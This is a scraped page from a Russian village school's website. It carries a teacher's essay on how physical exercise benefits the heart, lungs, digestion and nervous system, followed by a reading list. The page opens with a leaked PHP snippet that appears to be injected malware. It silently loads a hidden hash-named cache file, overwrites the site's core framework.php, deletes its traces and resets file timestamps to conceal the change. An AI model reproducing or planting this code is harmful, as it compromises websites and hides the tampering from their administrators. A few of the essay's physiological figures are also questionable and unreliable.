$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Физическая культура – источник здоровья.

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210388

На сайте

Сейчас 15 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Физическая культура – источник здоровья.

Учитель I квалификационной категории

МБОУ «Сагарчинская СОШ»,

«Почетный работник общего образования РФ»

Ткачев Петр Ильич.

 

План.

 

  1. Введение.
  2. Движение, физическая нагрузка – необходимые условия нормального развития и работы человеческого организма. Физическая культура – главное средство улучшения здоровья человека.
  3. Роль двигательного режима дня в жизни человека.
  4. Влияние занятий физической культурой на систему организма человека.
  5. Список используемой литературы.

 

 

 

Современное развитие техники требует от разных профессиональных групп населения не только соответствующей производственной квалификации, высоко образовательного, политического и культурного уровня и хорошей общей физической подготовки. От этого фактора в большей степени зависит степень сохранения работоспособности человека.

 

Физическая культура и спорт все прочнее внедряются в повседневный быт наших людей. На заводах, фабриках, в учреждения проводится производственная гимнастика, которая способствует высоко производственному труду и укреплению здоровья. Систематические занятия физической культурой и спортом, соблюдение трудящимися правильного режима труда и отдых в сочетании с закаливанием является мощным средством предупреждения многих заболеваний.

 

Организованный культурный отдых в значительной мере способствует повышению производительности труда.

 

Физическая культура у нас в стране не исчерпывается одними лишь спортивными упражнениями, гимнастикой и играми, в сфере её деятельности – общественная и личная гигиена труда и быта, использование естественных целебных факторов природы, правильный режим работы и отдыха.

 

Значение физической культуры возрастает в связи с тем, что развивающаяся автоматизация, механизация, замена тяжелого физического труда работой машин – всё это идущее на благо человека, вместе с тем способствует снижению мышечных нагрузок человека. На производстве всё меньше работает физически. По дороге на работе он использует транспорт, дома – лифт, стиральные и другие машины.

 

Но движение, физическая нагрузка – необходимое условие нормального развития и работы человеческого организма. В известной степени комфорт может лишить человека здоровья, если он не включает в свою жизнь, в свой быт необходимую двигательную активность.

 

Народная мудрость гласит: «Деньги потерял – ничего не потерял, время потерял – много потерял, здоровье потерял – всё потерял». Здоровье человека – это народное богатство и его надо беречь и постоянно укреплять.

 

Обычно мы считаем себя здоровыми в то время, когда не замечаем каких – либо затруднений и не чувствуем боли в органах нашего тела при выполнении всех естественных, трудовых, бытовых функций. Здоровый человек не замечает своего сердца, не чувствует его и не думает о нём. Только при возникновении некоторых болезней мы ощущаем боль и тяжесть в области сердца и настороженно следим за его деятельностью.

 

Когда люди здоровы, они также не замечают своего дыхания, выполняя физические нагрузки, не испытывают недостатка воздуха, одышки.

 

Среди причин, вызывающих различные заболевания, довольно значительное место занимает недостаток физической подвижности в повседневной жизни человека.

 

Резко ограничивающие свою подвижность люди начинают страдать от малоподвижности – гипокинезии. У них нарушаются механизмы физиологической регуляции, ухудшаются жизненные реакции нервной системы, обмена веществ, органов кровообращения, дыхания, пищеварения и выделения. При малой физической подвижности привычный приём пищи обычно приводит к накоплению в организме избыточного количества жировой ткани. Излишний жир, отложившись в грудной клетке, нарушает дыхание, и тогда любая, даже не очень тяжелая работа вызывает одышку.

 

Полнота всегда старит человека и делает его менее жизнеспособным. Она как лишний груз утомляет организм и в первую очередь сердце, содействует старению сосудов и развитию в них атеросклероза.

 

Малоподвижность и ожирение медики иногда называют увертюрой к сахарному диабету.

 

Медики в шведском городе Мальне провели эксперимент. Они решили выяснить возможность предупреждения сахарного диабета путем повышения физической активности. Обследовав более тысячи горожан, врачи выявили среди них сто человек,  находившихся в «зоне риска» - они проявили склонность к заболеванию диабетом.

 

И вот все сто человек под наблюдением специалистов лечебной физкультуры приступили к регулярным тренировкам. Некоторым была дополнительно прописана диета. Уже через три месяца врачи зафиксировали заметное улучшение состояния пациентов, а через полгода они покинули «зону риска». Однако многим из них так полюбились физические упражнения, что и после завершения эксперимента, они продолжали тренироваться самостоятельно.

 

Известно, что если к малой подвижности и перееданию прибавляются нервные перегрузки и отрицательные эмоции в виде обиды, злости, ревности, досады, то в этом случае в организме созревает сочетание неблагоприятных факторов, которые способствуют возникновению и развитию нарушения обмена веществ, приводящих к ожирению, диабету и другим болезням.

 

Чтобы предохранить себя от подобных болезней, необходимо систематически и настойчиво заниматься различными видами физической культуры в соответствии с состоянием здоровья, физической готовности и личным вкусом.

 

А ведь многое зависит от одного желания человека разумно регулировать свою двигательную активность и тем самым укреплять своё здоровье. Обидно, что в тысячах случаев мы не пользуемся рычагами, которые находятся в собственных руках.

 

Нельзя ликвидировать недуги и излишнюю полноту, не изменив характер своего двигательного режима.

 

От того, как организован режим дня и как используются занятия физической культурой и спортом, во многом зависит деятельность различных систем и органов человека. Покой и движение в режиме дня каждого человека должны дополнять друг друга.

 

Систематические занятия физической культурой поддерживают нормальный уровень деятельности и работоспособности человека.

 

Во время выполнения физических упражнений от работающих мышц, суставов и связок в кору головного мозга поступает большое количество сигналов. В свою очередь мозг направляет сигналы сердцу, легким, мышцам и другим органам, тонизируя их.

 

Французский врач клиницист Тиссо писал: «Движения могут заменить лекарства, между тем как всевозможные лекарства, вместе взятые, никогда не могут заменить движения».

 

Отец медицины, древнегреческий ученый Гиппократ, проживший 104 года, отмечал, что для продолжения жизни необходимы гимнастика, свежий воздух, прогулки.

 

Врачи и ученые рассматривают движение в различных формах как действенное средство оздоровления организма, предупреждения многих заболеваний, продолжения жизни.

 

Занятия физической культурой и спортом помогают закаливать волю, вырабатывать упорство в достижении поставленной цели, стать для самого себя воспитателем.

 

Способность распределить силы в творческом процессе (физическом, умственном), точно определить, когда следует напрячь силы, а когда отдохнуть, сэкономить энергию, - эти качества жизненно важны для каждого.

 

Для здорового человека средних лет, занимающегося умственным трудом, необходимо не менее 8 – 10 часов в неделю уделять физическим упражнениям, в воскресенье – не менее 3 – 4 часов (лыжный или пеший поход в природу), в середине недели 2 – 3 часа (коньки, бег, плавание, ходьба); ежедневно – от 15 до 35 минут (утренняя гимнастика, бег трусцой или обычный бег, пешие прогулки).

 

Немаловажную роль физические упражнения играют в профилактике профессиональных заболеваний. Так применение физических упражнений в комплексе оздоровительных мероприятий для шахтеров показывает эффективность специально подобранных физических упражнений, которые мы назвали профилактической гимнастикой.

 

Эффективность использования физических упражнений оказалась значительно выше при комплексном применении их с общим ультрафиолетовым излучением, чем при отдельном применении только ультрафиолетового облучения или только физических упражнений.

 

Физическая культура должна занять свое место в режиме дня каждого человека, какого бы он не был возраста и каким бы трудом – умственным или физическим - ни занимался.

 

Следует отметить, что при ограничении общей подвижности у человека ослабевают мышцы ног, рук, туловища, значительно ухудшается функция сердечной мышцы, что может привести к сердечной недостаточности, к общей слабости организма.

 

Наше сердце, как маленький неутомимый насос, непрерывно прогоняет кровь по всем кровеносным сосудам тела, которые доставляют в самые отдаленные уголки организма питательные вещества и кислород, и забирает продукты распада тканей, способствуя удалению их из организма. Работа сердечной мышцы тесно связана с работой всех остальных мышц.

 

Ясно, что, развивая и тренируя свои мышцы во время занятий физическими упражнениями, мы также развиваем и укрепляем сердечную мышцу. Так, учеными установлено, что у людей, не занимающихся физической культурой и спортом, в покое при каждом сокращении сердце выбрасывает 50 – 60 кубических сантиметров крови. У систематически занимающихся физическими упражнениями при каждом сокращении сердце выбрасывает до 80 – 100 кубических сантиметров крови и за сутки поэтому в 14 тысяч раз меньше сокращается, и в меньшей мере изнашивается.

 

Исключительно большое значение имеет физическая культура для центральной нервной системы. Физические упражнения дают человеку чувство бодрости, жизнерадостности, улучшают настроение. Люди, страдающие нервозами, начав заниматься упражнениями, отмечают значительные улучшения своего здоровья.

 

Нервные клетки особенно чувствительны к недостатку кислорода. Когда человек находится в помещении, где накурено, душно, у него появляется усталость, сонливость, головная боль. Физические упражнения, проводимые на свежем воздухе, увеличивают поступление кислорода в организм, активизируют функцию органов дыхания.

 

Под влиянием физических упражнений увеличивается количество поглощаемого воздуха. Дыхательные мышцы становятся сильнее, реберные хрящи более эластичными.

 

В результате этого увеличивается экскурсия грудной клетки, которая определяется разностью её окружности на полном вдохе и полном выдохе.

 

Если у людей, не занимающихся физическими упражнениями, дыхательная экскурсия грудной клетки равняется 4 – 6 см, то у физкультурников она бывает 8 – 10 см, а у наиболее натренированных – достигает 15 – 16 см.

 

Физические упражнения повышают потребность организма в кислороде и заставляют легкие усиленно работать. В результате такой работы легкие хорошо развиваются и укрепляются. Объем их значительно увеличивается, и они могут пропускать через себя большие массы воздуха, что ведет к лучшему обогащению крови кислородом. Это повышение так называемой «жизненной емкости» легких измеряется специальным прибором – спирометром, который определяет в кубических сантиметрах объем выдыхаемого воздуха после максимального вдоха. Чем больше этот объем, тем лучше развит дыхательный аппарат. У нетренированных средняя величина жизненной емкости легких равна 3 – 4 литрам, а у натренированных (бегунов, пловцов, гребцов, лыжников) она доходит до 6 литров и более.

 

Систематически занимающиеся физическими упражнениями приобретают навыки глубокого дыхания, а глубина дыхания имеет очень большое значение. Делая глубокие вдохи и полные выдохи, можно во много раз увеличить вентиляцию легких.

 

Под влиянием мышечной работы изменяется не только глубина, но и частота дыхания. Например, при спокойной ходьбе частота дыхания возрастает от 16 – 18 до 20 – 22 раз в минуту, а при быстром беге до 40 – 60 раз. Слишком частое дыхание не приносит пользы, ибо человек при этом не успевает делать достаточно глубокое дыхание, оно становится поверхностным, в результате чего вентиляция легких ухудшается. Человек, много занимающийся спортом, при повышении потребности в кислороде обычно лишь не значительно учащает свое дыхание, однако каждый вдох его оказывается более глубоким. Это позволяет ему хорошо вентилировать легкие и облегчает переход кислорода из легких в кровеносное русло.

 

У хорошо тренированных спортсменов дыхание в покое бывает редким – 8 – 10 и даже 6 раз в минуту при большой глубине его – от 0,6 до 1 литра. При сильных физических напряжениях легочная вентиляция возрастает у спортсменов до очень больших размеров.

 

Большое значение имеют физические упражнения для правильной работы желудочно – кишечного тракта. Пища продвигается при помощи сокращения мышечных волокон, заложенных в стенках желудка и кишечника. Если мышечная система всего организма ослаблена, эти мышечные волокна тоже теряют способность к энергичному сокращению и пищеварение нарушается, появляются запоры. Физические упражнения повышают тонус всех мышц тела, укрепляют и тонус мышечного слоя пищеварительного тракта. Это способствует более активному процессу пищеварения, регулирует отправления кишечника.

 

У человека, не занимающегося физкультурой, происходит изменение в связочном аппарате, особенно у людей старшего возраста. У них постепенно уменьшается эластичность связок, снижается подвижность суставов, им трудно нагибаться, делать приседания. Если становятся слабее мышцы спины, появляется сутулость, и не только у людей пожилого возраста, но и у школьников, особенно в период интенсивного роста тела в длину. Слабость мышц брюшного пресса приводит к выпячиванию живота. В результате не только портится внешность, но и опускаются внутренние органы, в первую очередь желудок, ухудшается пищеварение.

 

Физические упражнения развивают и укрепляют опорно – двигательный аппарат: кости становятся более крепкими, подвижность в суставах увеличивается, что обеспечивает гибкость тела, сухожилия и связки делаются более прочными, хорошо развиваются и укрепляются мышцы.

 

Под влиянием физических упражнений в мышцах сильно повышается кровоток и лимфообращение, что ведет к улучшению их питания.

 

В тренированных мышцах в полтора раза больше капилляров, чем в нетренированных. Все это создает благоприятные условия для развития и укрепления мышц. Вот почему мышцы людей, занимающихся физическими упражнениями, отличаются большей силой, выносливостью и особой согласованностью (координацией) в работе.

 

Поэтому каждый из нас, настойчиво занимаясь гимнастикой или спортом, может сделать мышцы в 2 – 3 раза сильнее.

 

Систематические занятия физической культурой укрепляют нервную систему, снижают утомляемость коры головного мозга и повышают общую работоспособность организма.

 

Такие занятия воспитывают целый ряд очень важных волевых качеств – инициативность, решительность, смелость, настойчивость.

 

Однако бесконтрольность занятия физическими упражнениями, бег трусцой, купание в проруби, неразумное использование финской бани могут  принести и вред. Поэтому не нужно забывать о периодическом врачебном контроле.

 

Итак, физические упражнения – эффективное средство, предохраняющее человека как от ряда заболеваний, в первую очередь от сердечно – сосудистых, так и от преждевременного наступления старости.

 

Литература:

 

1. Кузнецов В.С., Колодницкий Г.А. Экзаменационные вопросы и ответы. Физическая культура. 9 и 11 выпуск.классы. Учебное пособие. – М.:АСТ – ПРЕСС школа, 2003. – 240 стр.

 

2. Хайрова Ю.А. Физкультура – труд – здоровье. М., «Знание», 1979 г.96 стр. (Народный университет здоровья, 7 Издается ежемесячно с. 1964 г.)

 

3. Журнал «Физическая культура в школе» № 2 2000 г. Статья «Физические упражнения в жизни человека» стр. 18 – 21 авторы Масленников С.М., Кузнецова Г.А.